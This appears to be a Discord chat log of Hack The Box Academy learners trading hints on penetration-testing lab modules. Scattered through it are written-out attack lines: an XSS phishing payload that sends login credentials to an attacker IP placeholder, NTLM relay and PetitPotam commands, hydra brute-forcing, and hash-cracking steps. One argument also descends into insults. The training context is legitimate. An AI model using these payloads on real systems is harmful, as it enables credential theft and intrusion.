#modules

Hey guys! Super new to HTB modules and I'm having some trouble understanding how to use the VM to carry out a scan with Nessus in the Vulnerability Assessment. The section in question is the "Getting Started with Nessus" section and I'm getting a bit overwhelmed with how to even start using Nessus at all. Does anybody have some tips to get me rolling?

Need some help if possible

guys. im doing the attacking sommon services lab. i found the domain, usernames and passwords but failing on ssh. any headsup!!!

Hello everyone I'm new here my greetings to you all

which assessment, easy, medium or hard?

medium

from the high port go to the default one

Can I get some nudging with the Footprinting Medium capstone ? Preferably in DM so we don’t spoil

jas@...: Permission denied (publickey).
this is what i get??

Do you have the public key, e.g. id_rsa?

@autumn pilot excuse me i have uploaded successfully the shell but i dindt get any output

iin upload file attacks module

on which module and section?

FILE UPLOAD ATTACKS
Page 5
Blacklist Filters
Blacklist Filters

You are not supposed to get a shell on that machine to get the flag

Once you have a working php file that you have uploaded, e.g. php is being executed then you will be able to just get the file

Sorry, I thought you meant a reverse shell

Okay, so yea you can get a shell, but you need to find if the thing that you are uploading is being executed

could i dm you to send screenshot that shows clearly

sure, go for it

no.i guess i have to create one or download

If there isn't the id_rsa of the user anywhere that you can get it, then you cannot ssh in

thanks. letme search

I've got a problem with a module where i have to use the flag of the previous question as a password to ssh into the next user, the Problem is that the flag end with !3 which translates to exit, any idea how to escape translation in the terminal?

single/double quotes?

nope they will be read as part of the password

hmm it works if i don't use the terminal but when i ssh via remmina

I am at the same module. What the hell is this thing with null passwords in the next tasks anyway???

the password ist the flag of the previous question

and you have to ssh from one user to the other

Oh how nice of HTB not explaining this one.

yes did you complete the introduction to bash scripting already?

Yes, I have.

Ping me if you need any assistance.

nah i completed it ... took me 5 days finding the obscure problem of the code and escaping it -.-

In fact, i am just doing this module to mark it complete for 2 Skill Paths, I did not read the material, just jumped straight to the tasks.

Again, password from previous task is not working.

I am starting to get frustrated.

for which ssh session?

user 1?

user2

yeah don't use the terminal, use remmina or something else instead and paste it via right click

i'm stuck at the task for user7 atm

@alpine dome which module

@placid quest INTRODUCTION TO WINDOWS COMMAND LINE

@alpine dome Yeap, the password is not working

Remmina is not working as well

@alpine dome did you try with evil-winrm

It says SSH

the problem is with the terminal translating parts of the password in something else like the !3 of the password for user1 into exit, and again the ' ' in the one for user2, just copy paste everything manually ... except for the password for user7 it has a typo

the password for user7 is all lowercase

so for user2 i have to submit the flag I found from user1?

jup and so on

And ssh from inside the box, rather than from my own machine?

yup

deep down the rabbit hole XD

Now it does not allow me to login from user0

hmm? weird restart again it is mandatory to stay on the target from the end to the beginning because of the ssh session token

Fucking crap.

Why on earth do we have to put up with this and not simply focus on the damn tasks?

idk

https://tenor.com/view/hang-first-time-smiles-gif-14991372

Not my first time, I have dealt with this for a very long time.

It is the "get frustrated harder" mindset of this toxic field.

it's part of the learning experience

Yes, I have heard this bullshit way too many times before as well.

I will not elaborate more, there is no use, noone will listen anyway.

pls tell me if you have solved the task for user7 i'd like to know how to approach it

i'm completely dumbfounded on that one solved all the others except for the last one and user7

@livid quest I have DMed you to avoid spamming here.

Hi all, Im trying to make a tunnel in AD Skills assessment Part I but im finding it impossible. Can someone give a sanity check please? Thanks

What have you tried?

chisel and ligolo. None of them work

Don't remember having any trouble with tunnels on that one, chisel should work most of the time. What error are you getting?

Better speak via DM to avoid spoiler, would you mind?

Ok

https://r.mtdv.me/videos/345663452

god damn it

can someone explain in intro to network analysis what is correct answer to read the fike /tmp/capture.pcap?

I tried -r file -X

this works

best practice would be -rX file.pcap

but that doesnt seem to work

tested on box

also -Xr seems to work but not for correct answer

You must specify the complete command as the answer.

Thats bs

but got it

there is always one q that is like this

Could anyone help with "ABUSING HTTP MISCONFIGURATIONS" - "Password Reset Poisoning"? I'll share what I am trying to do.

Thanks!

Is there a reason why rockyou.txt in SecLists ist only accessable with root?

ls -la /opt/useful/SecLists/Passwords/Leaked-Databases/rockyou.txt
-rw------- 1 root root 139921497 Sep 23 2015 /opt/useful/SecLists/Passwords/Leaked-Databases/rockyou.txt
┌─[eu-academy-2]─[10.10.15.126

Its the HTB Parrot OS

depends, if you downloaded it as root yeah sure then root is it's owner

Its the OS you can access threw the browser it was just a lil weird

delete it and download it as general user and just use sudo if necessary

anyone good with AD that is up for a DM?

ah it is pre "installed"

yeah sure as u see it is owned by root and can just be accessed by root

but when you go via terminal as root to the directory you can mange the rights for it

Yeah it was just weird

yeah it is pre installed in the root directory which makes sense because the home directory and it's sub directories just gets mounted as part of the last installation process and their contains is predefined, so rockyou.txt is not a part of them

Its just weird cause this is the command they give you in the Module: LOGIN BRUTE FORCING

hydra -L /opt/useful/SecLists/Usernames/Names/names.txt -P /opt/useful/SecLists/Passwords/Leaked-Databases/rockyou.txt -u -f 178.35.49.134 -s 32901 http-get /

hmm kinda yeah, in general if you need to use a hacking toll always fresh terminaltab and sudo su as frist command

Yeah i guess

same under kali

you can dm me with where you are at / what you have tried

Have you scanned all the Ports?

Does the live engagement on "Shells and payloads" require port forwarding from foothold to attacker machine?
I am finding it a little difficult to use the foothold machine.

You dont need Port Forwarding

A part of the engagement says to browse inlanefreight.htb but I don't seem to find any browser besides Tor in that parrot machine

Yeah

Just open firefox in terminal

Thats the way i did it

I thought it wasn't installed 😐

seems it like it is

thanks

Hey can someone help me with something in XSS module pls?

why isn't this script working to remove the image url form?

document.write('<h3>Please login to continue</h3><form action=http://OUR_IP><input type="username" name="username" placeholder="Username"><input type="password" name="password" placeholder="Password"><input type="submit" name="submit" value="Login"></form>');document.getElementById('urlform').remove();

https://i.gyazo.com/2d190a345e31a007e1d2eeb249cc33c1.png

Have you actually made the change/edit to include your IP

and then have you gone down the chain to make the admin to visit that link

yes

uhmm i dont really understand this part tbh sorry im a newbie

read through the module/section and follow the steps

i dont get it?

what do i do

you do the thing that was explained in the section of the module

e.g. the wall of text that you had read allegedly

lol i didnt mean that, i meant like what do i do to solve this what am i doing wrong

as you can see in the pic i sent its like a long text there and it looks like it didnt get executed

it doesnt appear like the images on the module

after injecting the payload

');document.getElementById('urlform').remove();'>

this one

Hello all,

I’m having issues with the Password Attacks - Hard lab. I’ve used crackmap exec with the mutated password list, both Johanna and johanna, as well as —local-auth for good measure. Tried attacking winrm as well….but no dice…was wondering if someone could give me a nudge?

take another look at ||SMB||

I don’t fully remember this lab, but don’t copy and paste from the module (which is what you did). Start from scratch and build it as you go. The labs aren’t always copy and paste.

Hey can somebody help me with osTicket part in Attacking Common Applications, thanks

ah okay, so i have to figure it out from source code?

on whats going on and what am i doing wrong

that’s the point of the labs, to go through yourself and understand why it works. Not just copy and paste

Crackmap isn’t working on smb either…and smbclient is also giving me the blues 😢 slowly dying inside

you can dm me with what you’ve tried and where you’re stuck

You betcha!

hi, I got the flag from the \DC01\david\david.txt file in the Pass the Hash (PtH) section of the Password Attacks module, however it is apparently not the correct answer to the question.... Anyone got any help here or experienced the same?

to clarify the answer was correct for the \DC01\julio\julio.txt file, which is the next question (which is the same just for the julio user), and there are no other files on the \DC01\david share

yes you need to go from one server to another one then you can find it

from rdp one * 😉

sick thanks for the quick answer, however im still confused as to why once the share is accesses its contents would differ from server to server?

the share is the wrong way

i stuck on the same thing yesterday 😉

ok ill give it a go 😋

just read the lesson again and again 🙂 you will find it 🙂

i stuck on the next thing maybe you can check then if you can connect there to the rdp client for me this isn´t working...

ok well it turns out i got the flag i just didnt realise the 1 was actually an l 😆

yeah worked for me, you mean the last question?

nope the next section pass to ticket there the rdp creds dont work

you need to bypass it with the current sessions

not there yet then sorry just finished that section 😦

no stress 😉 i fixed on my way

thanks for the quick help again!

any one able to assist or maybe able to tell me why chisel wont work on the server machine in the pivoting module? shows that GLIBC_2.32 not found but is required. is it something wrong with the build?

Try downloading the binary (1.7.4 worked for me)

ill try that

locatewhich whichlocatelocatnetstat

yea that is giving me the same error

what is the name of the file you downloaded on github?

i downloaded the chisel-1.7.4.zip from the binaries

sorry assets

don't download the zip, download the windows_amd64.gz

its being run on a linux machine.

im on FOotprinting medium lab but I reached the end but i got the admin password but it isnt working when i enter it on hackthebox

so the linux_amdx64?

yep

I didn't remember if it was windows or linux lol

gotcha. ill try that one

dont build this version

just transfer the file

ok

Where exactly did you enter the password?

the modules

where i completed hard and casy

make sure there are no spaces before or after the password

ok. yes that seemed to have taken on the server. now to connect and get that flag

worked like a charm. thank you

no problem ^^

i got the password but i dont know how to log in to SQL server by administrator

I’ll check my notes, but I didn’t use LaZagne for it

check dm didn’t want to spoil the challenge.

Hi stuck on Log Poisoning from FILE INCLUSION, Im not able to visualize nothing when accessing /var/log/apache2/access.log why?

are you sure there are no filters in place? might want to try Burp Repeater as well

can I dm you?

sure!

thanks

Active Directory Enumeration and Attack >Bleeding Edge > Petit Potam. I have issue when trying to obtain the CSR from the Web Enrollement services. Any idea?

sudo python3 ntlmrelayx.py -debug -smb2support --target http://ACADEMY-EA-CA01.INLANEFREIGHT.LOCAL/certsrv/certfnsh.asp --adcs --template DomainController

python3 PetitPotam.py 172.16.5.225 172.16.5.5

Anyone available to help me out with Attacking Enterprise Networks - Lateral Movement? Trying to get Set-DomainUserPassword to run but it is not a recognized cmdlet. I have imported powerview and even powersploit with no luck

I have an issue when requesting a TGT using PKINIT tool gettgtpkinit.py. I always have this error saying that KDC has no support for PDATA type. Does the machine supports PKINIT?
Active Directory Enumeration & Attack > Bleeding Edge > PetitPotam

Hey guys, having trouble with the last question for the DNS section of the Footprinting module. Does anyone have any advice/ tips?

You need to find all zones

Okay so cant get ahold of support yet so gonna ask the fine individuals of modules for a little trouble shooting help
CBBH - EXAM TROUBLESHOOT CONNECTION

1. I reset and added IP and <website.local> to /etc/hosts
2. I can ping and nmap scan the ip address
3. I'm connected to the Exam VPN
4. What might be causing me to not be able to connect via browser?

Looks like it takes quite a while for it to actually come up even though its been "up" TLDR wait 5 minutes

Having an issue using hashcat to crack the .vhd file in the Password Attacks hard lab. It's showing me that it's going to take over 230 days to complete. I ran the commands, #bitlocker2john -i file_name.vhd > backup.hashes, #grep "bitlocker$0" backup.hashes > backup.hash and then ran #hashcat -m 22100 backup.hash /usr/share/wordlists/rockyou.txt (this is where my rockyou.txt file is at) -o backup.cracked. Any ideas why it's going to take so long?

File_name.vhd is actually backup.vhd because this is what I copied the drive to once I mounted it.

just use ur mut_password

john --wordlist=mut_passwort.txt backup.hash

Shouldnt take long

I'll give that a shot. Thank you!

if you havent gotten yet i would also try using john

I'm using john and I think I've got it but it's still going. I have a possible password with (?) beside it. Is that it?

Try it

it could be. i cant remember if mine had a ? or not but that has happened.

Its with an !

Thank you, both! I appreciate it!

Okay, I have the drive moved over to the Windows machine but it won't open or mount as a drive. I have it saved to the desktop. Any idea why it won't open or mount as a drive?

https://www.groovypost.com/howto/attach-copy-files-vhd-windows-10/

First thing that popped up when I used google

man none of these tunneling machines are updated for the new versions of these tools are they

statically built chisel go brrrr

im in the ptunnel-ng section

i just sent it but it doesnt ahve the GLIBc_2.34 version required

lol

im just gonna use the tool i know works and just keep in mind what i learned

build the tool statically

youre getting that error cause its looking for the linked lib in the system. if you build statically your binary will be larger but it wont need external libraries and will function better

i thought i did build the tool statically

how do you build your tools?

im just going off what the section says to be honest

depends on the tool and what language it uses

for this one its the ptunnel-ng.

I am working on the Attacking Enterprise Networks Module, Web Enumeration and Exploitation section. The last question is on command injection and they lead me to believe I should be able to get a reverse shell with socat. I am wondering is there is anyone who might be able to help me decode the error I get from the socat connection? I can get the web host to make the connection back to me, but the connection immediately breaks.

i believe --disable-shared and --enable-static as options to configure before building with make will work. but Ive not tested

I see some cases where libc wont build statically for some stuff despite the options which makes things tricky

i can give those options a try. and let you know. im assuming that most of these tools are similar that they have a static build option then?

if so then ill attempt to make sure i build it statically when this happens

in the future when i am doing this forreals

depends on what its programed in

tools written in C usually are built with configure and make

ill keep that in mind. ptunnel-ng looked like it used a bash script to build with the autogen.sh

golang on the other hand defaults to building static bins, which is one reason why chisel feels so reliable most of the time

yea. i like chisel

@fathom pendant I got that, but I was trying to find a way to mount it to the machine we have access to in the session. I have the drive on my personal computer as well, but it won't let me open it. I found that it probably has to do with running Windows 11 and the TPM is blocking it. It won't even let me use a password to open it. I just get an Access Denied error.

Just as confused as you are…found the .vhd file, cracked the hash but have no clue what to do with it 😅 if I find something I’ll post it here

Thank you. I can't even open it because I stupidly updated to Windows 11 a few weeks ago. I should have stayed on Windows 10.

Once you've cracked the hash, the password it gives you will let you open the drive. You just have to mount it to a version of Windows before the TPM requirement.

yea windows 11 is trash

It looks pretty and I like some of the new features, but it really is a pain to work with in some ways. Case in point, working with downloaded .vhd files.

i think they are trying to make it more like linux or mac with some of the features. i reverted back as soon as i saw it

Okay, definitely feeling the “dumbest guy in the room” syndrome right now but it is what it is…so excuse the noob question…do I mount the file to the target machine from my machine (pwnbox) with the commands learned in The footprinting module?

I knew I should have done the same. Oh well. Live and learn. I'll hopefully be building a new rig soon and I'll definitely stick with Win 10.

@wanton mica you can DM me. I'll assist you with it.

Gotcha, boss

To all who are struggling with the B*****.v** file in the Password Attacks - Hard Lab…remember what @fathom pendant said…you need to mount the file to a Windows system….this can be ANY Windows system…😉😉

sorry to ping you, but can you help me with this section Weak Bruteforce Protections? https://academy.hackthebox.com/module/80/section/837#questionsDiv I have tried editing script with localhost and the wordlist is default-passwords.csv

can anyone help me with this section? or can i DM someone, thank you in advance.

Skills Assessment - File Inclusion can I dm anyone on this section?

Help please

for upload file inclusion

it donesnt work

• 2 Try to find an extension that is not blacklisted and can execute PHP code on the web server, and use it to read "/flag.txt"

its succsufully while using buprsuite

but when access at browser

it doesnt wokr

Can dm me

thank you

still need help

hi guys...i have been trying to connect to an smb share so that i can download a file. i tried different usernames and passwords i cracked but i got this error message " do_connect: Connection to failed (Error NT_STATUS_NOT_FOUND)
" help guys

Sidenote to this, it can be mounted on linux, but it's a bit more involved and you need to search a bit on what you need to install and how to do it. It is doable from the vm

Hi, I'm stuck for a question in File Transfer module at the second question of Windows File Transfer Methods. Can you help me ?

Does someone here at side server attacks module:?

Hey guys,
I am new to the HTB. Can someone pls help me with ssh tutorial. How to connect to the HTB server from my terminal

I am getting an error while connecting to the HTB. Error - port 22: Resource temporarily unavailable

@royal wren please check the faq

Restart machine

Is anyone else able to log into the Password Attacks - Pass the Ticket (Linux) machine using SSH over -p 2222? The first instructions state "Connect to the target machine using SSH to the port TCP/2222 and the provided credentials. Read the flag in David's home directory." But I'm unable to SSH over port 2222 with the provided creds.. "david@10.129.204.23: Permission denied (publickey,password)" "david@inlanefreight.htb: Permission denied (publickey,password).
"

can you show your command with spoiler? should work

||ssh david@inlanefreight.htb -p 2222||

I also tried using the box IP instead of the domain, and made sure to put the domain in /etc/hosts when using it

try with this ||sudo ssh david@inlanefreight.htb@<target_ip> -p 2222||

Still no. I assume my command would have worked since before prompting for the password it gave the whole "The authenticity of host '[10.129.204.23]:2222 ([10.129.204.23]:2222)' can't be established. Blah Blah" and asked if I wanted to add it to he list of known hosts - you know, the typical SSH warning..

yeah

have you tried respawning the target?

yea a few times

so you were able to get in then?

I just tried to SSH using creds from a previous module after spinning that box up to and got right in to that previous module

at the time... haven't tried now but I am in the easy lab password ||trying to crack ssh|| and thought haven't got results seems to work when i try to connect

yeah that's good... make sure you store all the passwords from the exercises for the labs

appreciate your input! I guess I'll move on to the next module and come back if anyone is able to verify they can get in.

how long ago were you able to get in?

some days back tbh ...

Trying to run firefox_decrypt.py for the linux credential harvesting section of the password attacks module to get Wills password, but I keep running into the error Traceback (most recent call last): File "firefox_decrypt.py", line 46, in <module> PWStore = list[dict[str, str]] TypeError: 'type' object is not subscriptable has anyone encountered this? The tool runs fine on the attack box, but not on the target.

didn't have to use firefox_decyrpt.py

Any tips? Ive been stuck for a while

sure ! you already ssh right?

Yes, landed foothold after getting kiras password

sorry my fault i did use firefox now that I recall

you saw the ||.bash_history|| right?

Hi guys, any nudge on windows privilege escalation assessment 1 ? i cannot seem to find the user ldapadmin, i got a system shell but no luck on finding it

how are you running firefox_decrypt.py can you show your command with spoiler?

Hi, for "Active Directory Enumeration & Attacks, AD Enumeration & Attacks - Skills Assessment Part I". How do we upload chisel to the attack host? I tried upload via webshell it throws a server error. I try powershell cmd download, it also does not download anything. Thank you.

sure so I set up a python web server to get the file onto the target in the|| .mozilla/firefox|| directory and then once it was in there I ran ||python3 firefox_decrypt.py|| but it spits that error out to me every time

But if I run the file on my attacker machine it works fine, so it shouldnt be anything with the file

try with this one ||python3.9 firefox_decrypt.py|| just in case

That was it! Thank you!

I'd reset the lab

yes

indeed

How are you connected to the host? RDP? Then you can mount a share drive.
Otherwise via SMB share on your PC, upload the file to a web server and download it from there. There are several possibilities.
Have a look at this module:
https://academy.hackthebox.com/module/details/24

I downloaded the parrot ISO to hack the box from the parrot page, to use pwnbox do I have to install something else?

https://help.hackthebox.com/en/articles/6369713-installing-parrot-security-on-a-vm

thnks bro

After following those steps, do I have to do anything else? or with this I would already have the pwnbox

should walk you through how to setup the VM. Installing the tools you need, preferences, etc. is on you

You have to download the openvpn connection file in order to securely connect to the HTB network

^^ that is true. If you're setting this up to connect to the HTB network you'll need to do the above. You won't just be "connected" to the HTB network. If you want to use Pwnbox you could just use the web version which is already connected to the HTB network and has most of the tools you need

For this question, do I have to use the VPN?

o i dont pass photo here

i dont cant *

sory for my english xD

you have a configuration, which you can download from the Academy site. From there you just need to execute sudo openvpn /path/to/config.ovpn on your VM to connect to the HTB network

use cURL from your Pwnbox(not the target machine) to obtain the souce code of the hhtps...... website and filter all unique paths of that domain. submit the number of these paths as the answer

for this question its necesary connect to vpn?

wait I'm confused...

Are you on PwnBox (In-Browser) or a VM?

VM

in reality i dont know what is a pwnbox ,

pwnbox = to parrot?

i donwload ISO of parrot security version hack the box

if you're on a VM and the question requires you to connect/interact with HTB labs, yes you will need a VPN

okay thnks

what is a all unique paths of the domain?

I am the beginneer who is earger to learn pentesting but i dont know what online resources are used . So, to all my seniors, please share me with the best resources to start my journey of learning pentesting. Thanks

HTB Academy, CPTS path.

How do you get HTB certificates?

https://www.hackthebox.com/blog/learn-to-hack-beginners-bible

Once you have passed the exam, you can simply download the certificate.

Thanks,

Hi, people. I need little nudge with Pivot assessment, I got everything - creds, keys, hashes, etc from the pivot machine and first target. I found the DNS ip address and scaned the two /24 networks, but I get no response from anything, so I can't start enumeration. Any help will be appriciated.

Which question are you stuck on?
You can send me a DM.

anyone free for this?

@acoustic owl will do, thanks.

Hi Guys,
any hint regarding the inject machine ?
I'm trying to upload a shell in an image form
changed the extension and the content type but still not working

Am I missing anything?

Read #welcome and verify your account. Then go to #1083533577410596956 . I'd also put your message in spoiler tags to avoid spoilers

would appreciate any nudge.. i finished the whole module but still stuck on this one

Always bake a || lazagne ||

@acoustic owl can i dm you about ad skill assessment II?

Yes sure, but which SA?

the second one, I solved it just have some questions

@acoustic owl i tried it and again [+] 0 passwords have been found.

Send me a DM

Still need help? If yes, then DM

Thanks but now i have completed that module

yo anyone can guide me abit on the first scenario of the AD skill assessment

Hi,
On AD Enumeration & Attacks - Skills Assessment Part I
Anyone have find how get the clear password of tpetty ?
I'm stuck for compromise the DC and acces to it.
I'm in RDP on MS01 but i'm stuck here ...

yom im literally exactly there

wanna work on it together?

@livid bluff @jaunty vigil feel free to dm if you're stuck

i think we figured it out

thank you!

perfect I've heard of two ways to solve this but as long as you got it🙏

ok ill dm you to learn haha

If you know another way, I'm happy to learn

I think with mimikatz the passwords appeared as (null)

If you know another way, I'm happy to learn

I remember I followed this tutorial. https://www.youtube.com/watch?v=M1O7xH2uJtM

hi, is there anyone who can possibly guide me for the following please: ** Question for Windows Priv Esc PILLAGING - Restore the directory containing the files needed to obtain the password hashes for local users. Submit the Administrator hash as the answer.** - Could someone point me in the right direction, Im running user Jeff as admin and still access denied with get the backup.

|| restic.exe || is your friend

ohh really?! , thank you kindly for the tip. I shall give it another go.

If you need help with send me a DM

thank you, appreciate it

hello all, I am doing Attacking Common Applications - Skills Assessment II , and I managed to get a terrible shell via msfconsle and i can't upgrade it, looking for flag.txt, but no results, I searched in every directory and i could not find it, i thought i might need to elevate my privileges to find the flag in the root dir. , but it's impossible with the shell i have

and i found some credentials, but they serve nothing

any help and/or nudge is well appreciated

alright. time to admit im stuck. im in the skill assessment for the pivoting. i was able to get into the first windows machine. i found the user and was able to get the hash for the v user and stuff. dont know if i need it but i got it. found the other machine im supposed to pivot to but the user im using cant connect. any nudges?

once you have those credentials you must look for an ip address to be able to connect with v***, note that there is an ip address that is a ||rabbit hole||

well there are 2 ips i found but one doesnt seem to connect at all. the other im figuring i gotta use the user v but other than the has from an lsa dump i cant seem to crack his creds. im assuming its nothing rockyou can find

if u have completed Blacklist Filters from FILE UPLOAD ATTACKS , can I dm you?

sure

thanks

im having issues getting the creds for v. is it a i need to crack type cred or its somewhere if i search deep enough type.

actually when i reset im going to attempt to use metasploit to start with to see if i can get a better route

some updates om the issue, I made a costume name,pass list to brute force ssh and i got no results,

please any help is really appreciated, and i did explore the system more

Have you discovered all the vhosts?

i have tried rce via WordPress, but login creds are wrong

vhost: blog , so i assumed it's blocked path

Yea, there's blog and there's 1 more

||The credentials you found should be useful in 1 of them||

i think you referring to "vhost; monitoring"

i got a shell via that vhost, but it's a terrible shell, i can't find the flag location with that user (www-data)

Enumerate that second vhost to identify the app, and search for public exploits. I don't remember using Metasploit, you might get a better shell with a different script

um, try with|| lsass and mimikatz||

i used an lsa dump to get the hash. but i havent tried mimikatz so i can try that next

I just finished the *Attacking Common Applications * module, a great thank for @steady hawk for the nice nudge

We allowed to ask for guidance on enterprise labs here? I am wanting to ask if a certain exploit is possible through this method I am trying to use.

this is for academy modules. I’m actually not sure if there is a channel for that unless is role locked. Is there no support button/view on the site?

There is a contract support, but I am mainly just wanting to see if my thought process on trying to carrying out a certain potential exploit is correct. I was seeing if it be okay to ask the community here about it if its allowed.

I don’t think it’s against any rules the only problem is most of the people here probably don’t have access to the enterprise labs and therefore wouldn’t be able to help. I wish my company paid for them🙃

you could try verifying your account (#welcome) and then ask in #1024429874246590575 ?

Well the exploit is particular to the labs, Its mainly me wondering if alter a server response to pull from my custom url rather than another url could lead to RCE or a reverse shell.

But ye didnt even realize I wasn't verified.

Ill do that instead lol

nvm, after playing this out I realize this "exploit" only affects client side and not server side.

thats nice, this is for discussion on module content

how do i properly format my answer to this question Perform a DCSync attack and submit the NTLM hash for the khartsfield user as your answer.

no matter which way i copy the hash it wont accept it im forcing ntlm too so thats npt the issue

please delete that, it is a huge spoiler

hint ||that whole line is not the hash||

Hello Everyone. I connected to a vpn. And its showing green. but it will not let me "spawn Machine". Basically like I haven't completed the previous step. Is this a bug?

modules dont have a spawn machine button

#rules and #welcome

in the beginning of HTB Academy it does.

i tried multiple combinations this wasnt much of a hint lol i tried the straight ntlm hash

shit like this is y im so slow completing academy since i cant writer spoilers its not any variety of :hash1:hash2:::

yeah cause thats not the hash

try submittingjust the hash

you need the hash. My hint was more than enough. An earlier module or an earlier section breaks down what you sent. Do some research and figure out what that line is

yeah ok

Now that I got it right just wanted to say ur hint was shitty and the answer don’t make any sense I’m under the assumption the ntlm hash is two hashes the nt and lm hash the answer it required of me even in the examples used in Active Directory fundamentals they were shown with both hashes

@rustic sage don’t be a smart ass with ur useless hint that anyone with eyeballs can understand

hey screw off. they were correct. the whole line you were trying wasnt the hash. Dont blame them because you didnt understand

We aint getting paid to help you so fuck off with that entitled bullshit

Fuck off it was a simple question with a simple answer and his answer was condescending the answer to this still makes no fucking sense to me this is a direct quote from the fucking ad fundamentals module on this shit An NT hash takes the form of b4b9b02e6f09a9bd760f388b67351e2b, which is the second half of the full NTLM hash. An NTLM hash looks like this:

Rachel:500:aad3c435b514a4eeaad3b935b51304fe:e46b9e548fa0d122de7f59fb6d48eaa2:::

no that has the user, rid, and separation tokens in it, thats not a whole hash

moron

wanna bitch about other people and have 0 reading comprehension then blame others

karen energy

yelling at people cause youre too dumb to copy paste a hash and then cry about it

lmao

instead of saying thanks for the help and moving on with life

@sterile hawk can we do something about this asshat

Could a moderator explain this guy here times the rules of etiquette?

Right like even if a piece of advice/hint wound up not being useful to you directly doesnt mean you act like an ungrateful piece of shit over it.

I am not talking about you

I know, Im agreeing with your agreeing with me

Hi guys, looking for your suggestions, what do you think about the modules below:
(their rating not seems that high but the syllabus looks interesting)

1. SESSION SECURITY
2. SERVER-SIDE ATTACKS
3. WEB SERVICE & API ATTACKS

All three modules are really cool. I liked them all

glad to hear that, thanks!

ty

Can someone lend me a hand on the Server-Side Attacks – Skills Assessment please? I’ve been at it for days.. I’ve tried the following: ||I deobfuscated a JS file. I tried fuzzing for parameters to try SSRF with the contents from the file. I’ve also tried SSTI and SSI on endpoints with no luck. Not sure what to do next.||

Take a close look at the JS file.

||I did, it revealed an internal address. I'm not sure how to access it without SSRF.||

Send me a DM

Thank you, I did

Anyone can give me a sanity check in Linux Privesc - Special Permissions. i think the first question might be broken

Send me a DM

I am not really sure but I think the footprinting lab - easy is not working correctly because if I connect (successfully) to the ftp server its just empty. Reading some posts on here there should be a pub / priv key pair

Am I doing something wrong ?

Did you scan all the ports?

yeah

are you sure

I am stupid

😂

thanks

got tunnelvision ig xD

I finished the easy module. But can I dm you? I got a question but I don't want to spoil it for others

I have like 0 notes on thay assessment so probably wont be able to help much. I just remembered that bit cause of payloads hint

ah ok

If you still need help, you can write me a DM

@acoustic owl found all the zones for the dns footprinting module, no success, tried brute forcing with every list and have nothing

You only need to bruteforce zones that do not give out the data voluntarily

can i have another hint?

Sure, send me a DM so we don't spoil here

Added

Hey y'all! I am new here and would like to know if this is the correct channel to ask for help with my module assessments?

Hey guys if anyone is available im still stuck on this assessment for pivoting about the same place as i was earlier

yes, for once an unverified user is in the correct channel!

Help! In Javascript Deobfuscation, the qn is "Try to Analyze the deobfuscated JavaScript code, and understand its main functionality. Once you do, try to replicate what it's doing to get a secret key. What is the key?" I have the code and I'm not sure what I should be looking at/for on the webpage using Ctrl+U

Lol Thanks! I got tired of getting yelled at on Reddit for being in the wrong room.

Try to understand what the code is doing and try to replicate it, and you should get the key. Hint: ||curl||

ok nvm i got a step further than i did before

anyone able to assist with a question on web attacks module final skills assessment?

actually idk if its a step further or just something i was able to do

I might be able to, dm me if you'd like

Thank you! I figured it out. Appreciate your help

yea im not a step further. on the pivoting skills assessment i was abel to pivot to the first windows machine and go the hash for the v user. cant crack it but i was able to sign into their account using pth. any nudges from here would be good because i cant seem to get any of my chains to work past the pivot host

also i do have the IP of the other 2 hosts on the subnet but cant get nmap or anything to reach out to them atm

Hey guys, I am currently on Nibbles - Initial foothold, in the Get Started module.

For some reason, after I upload the .php file, Nibbles never loads.

No response to my nc listener, if I curl the path to the file it never loads, neither if I try to load it through the browser.

Sure

Anyone available that did the LDAP Enum module for a quick chat? I'm trying to figure out why some stuff works. :P

hey so im currently trying to complete all the fundamental modules and at the moment i just started the mac os fundamentals module. the first question was answered on the page it was on but the second question is asking for mac os specific details and i didnt get a vpn connection or a target box to use. the only thing i get is the parrot os instance that is used for most other modules. how can i answer the questions about details of a mac os when im not on a mac os?

are you using a mac ?

if yes go to your apple icon and about mac then you find the macOS verison

yeah sometimes it is expecting you to have access to specific things which is weird because most modules give you a dummy to log into to look at

no im not using a mac. if i was i would be able to complete the task easily.

yeah i was expecting a virtual machine to use for the module. only one you get is the parrot os. i guess i wasted my cubes. even if i was on a mac my individual details wouldnt be the correct answer the module is asking for, so i dont know what to do. i guess ill just eat the loss.

• 0 Which ACE entry can be leveraged to perform a targeted Kerberoasting attack? On this question I tried answering Read servicePrincipalName but didnt worked, any hint pls?

@twin current it actually does tell you on the module page

that one is kinda on you at that point sorry m8 :/ you might be able to ping support about it using the chat bubble in the bottom right

Hello everyone.
im working on "ATTACKING ENTERPRISE NETWORKS" - "Lateral Movement"
the question
"Perform a Kerberoasting attack and retrieve TGS tickets for all accounts set as SPNs. Crack the TGS of the backupjob user and submit the cleartext password as your answer"

I have the cracked password, but HTB wont accept it? and the same goes for the question about the admin flag. any ideas what the deal is?

sometimes there's a hidden extra space character at the start or end of a copy/paste

doublecheck that

hello all
i trie to complete the hashcat module and i am stuck on the section : Cracking Common Hashes
the question is : Crack the following hash: 7106812***********************83
hash id says md2/5/4. i tried 4 or 5 with hashcat, rockyou and multiple built-in rules (rockyou3000, d3ad0ne)
but nothing work.... if some one has a hint it will be very aprecitate 🙂
thanks all have a nice day

did you try md2

no but i didnt find md2 mode in hashcat

can I dm anyone on COMMAND INJECTIONS Skills Assessment?

Could you get through? If not, feel free to dm me to see the code in your upload file

Cheers

Hello! I`m looking for help in the Dynamic Port Forwarding with SSH and SOCKS Tunneling

Any hint on how to solve the "[ERROR][com.freerdp.client.x11] Please check that the $DISPLAY environment variable...
"

I have tried both with pwershell and CL

got it!

Can dm me

Thanks, I sorted it out 🙂

you can search for the latest version with the search engine of your choice. The question wants to know the version of your Mac.

There is a way to setup macos in vmware so you can run it even if you are in windows or Linux.

anyone done Linux privesc ? I have a flag fs but wont accept it (i checked for extra spaces)

hi, anyone got a hint for which wordlist is good for q4 on footprinting dns?

been trying to bruteforce it (which i believe is what the question requires) for over an hour with no luck yet

youve checked sec lists ?

ye ive been trying a few different ones from there

but they have just been giving the same few subdomains that dont match what i need

cant remember which one i used :/

Iirc you need a more fierce wordlist

🫡

hey, have you done linux privesc module? 😄

No

Would anybody be willing to help me out with the Medium Footprinting lab? I am stuck at MSSQL part. I got the information from the secret file on the user account but I can't seem to use it anywhere.

Sure, with secret file do you mean|| im***.txt||?

@manic perch yeah, I have not been able to use it to get into MSSQL or the other local account

Ah wait, I solved it. Had the contents of the file copied into a text editor that made a certain character look like a different one, it's working now.

the fierce lists didnt give me the answer either 😦

What's the question for that one again?

What is the FQDN of the host where the last octet ends with "x.x.x.203"?

just trying with bash for loop rather than dnsenum incase that makes a difference

